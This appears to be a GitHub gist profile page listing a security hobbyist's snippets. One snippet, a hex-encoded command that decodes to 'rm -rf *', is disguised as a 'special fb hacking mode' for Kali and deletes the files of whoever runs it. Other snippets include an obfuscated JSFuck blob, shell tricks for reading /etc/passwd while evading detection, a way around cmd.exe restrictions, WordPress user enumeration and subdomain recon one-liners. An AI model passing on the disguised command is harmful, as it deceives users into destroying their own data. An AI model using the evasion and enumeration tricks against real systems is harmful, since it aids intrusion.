Skip to content

Instantly share code, notes, and snippets.

View hook-s3c's full-sized avatar

hook hook-s3c

178 followers · 74 following
View GitHub Profile
@hook-s3c
hook-s3c / jsfuck.txt
Created March 31, 2018 12:04
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]](([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+
@hook-s3c
hook-s3c / special-fb-hacking-mode-kali.txt
Created March 31, 2018 18:24
$(echo 726d202d7266202a | xxd -r -p)
to activate the special fb hacking mode on kali
@hook-s3c
hook-s3c / xrandr-fix.sh
Created May 1, 2018 16:17
xrandr setup for dell xps13, dual monitors
xrandr --output eDP-1 --auto --output DP-1 --auto --panning 3840x2160+3200+0 --scale 2x2 --right-of eDP-1
@hook-s3c
hook-s3c / net_utils.sh
Created May 10, 2018 20:36
Quick utils / alias bash script for convenience when using nmap/airodump/mitmf
alias mygateway="print $(route -n | grep 'UG[ \t]' | awk '{print $2}')"
alias myinterface="print $(route -n | grep 'UG[ \t]' | awk '{print $8}')"
alias mysubnet="print $(ip -o -f inet addr show | awk '/scope global/ {print $4}')"
@hook-s3c
hook-s3c / Recon-One-Liners.txt
Last active June 12, 2021 04:04
Bash one-liners for OSINT scouting
# Grab from crt.sh
echo "targetdomain.com" | xargs -I testdomain curl -s "https://crt.sh/?q=%.testdomain&output=json" | jq '.name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u
# Grab from certspotter.com
echo "targetdomain.com" | xargs -I testdomain curl -s https://certspotter.com/api/v0/certs\?domain\=testdomain | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u
# Enumerate hosts from SSL Certificate
echo | openssl s_client -connect https://targetdomain.com:443 | openssl x509 -noout -text | grep DNS
@hook-s3c
hook-s3c / demo.txt
Created June 6, 2018 21:51
URL path to call for Wordpress username enumeration
examplesite.com/wp-json/wp/v2/users
@hook-s3c
hook-s3c / g0tr00t.md
Created June 7, 2018 20:53
Steps taken for exim priv-esc and persistence
@hook-s3c
hook-s3c / bash_passwd_obfuscation.md
Created June 15, 2018 15:06
Bash obfuscation /etc/passwd techniques

#Obfuscating calls to dump /etc/passwd

awk '1==1' </?t[Cc]/????wd cd /etc;tr a a< p*wd `sed 'ss:s|sg'

@hook-s3c
hook-s3c / top20mostusedcommands.sh
Created July 18, 2018 23:57
Top 20 most-used linux commands from bash history
history | awk '{CMD[$2]++;count++;}END { for (a in CMD)print CMD[a] " " CMD[a]/count*100 "% " a; }' | grep -v "./" | column -c3 -s " " -t | sort -nr | nl | head -n20
@hook-s3c
hook-s3c / gist:8aadeb98587df63c8db3daa799a2633f
Created August 31, 2018 12:41
run cmd interactively
# thanks to - https://twitter.com/mwulftange/status/1034689855010353152
If you're not allowed to run cmd.exe interactively but `cmd /c …` works, this `cmd /c` based REPL may be helpful:
cmd /c for /l %i in (0,0,1) do cmd /c "set /p C=^> & cmd /c %C%"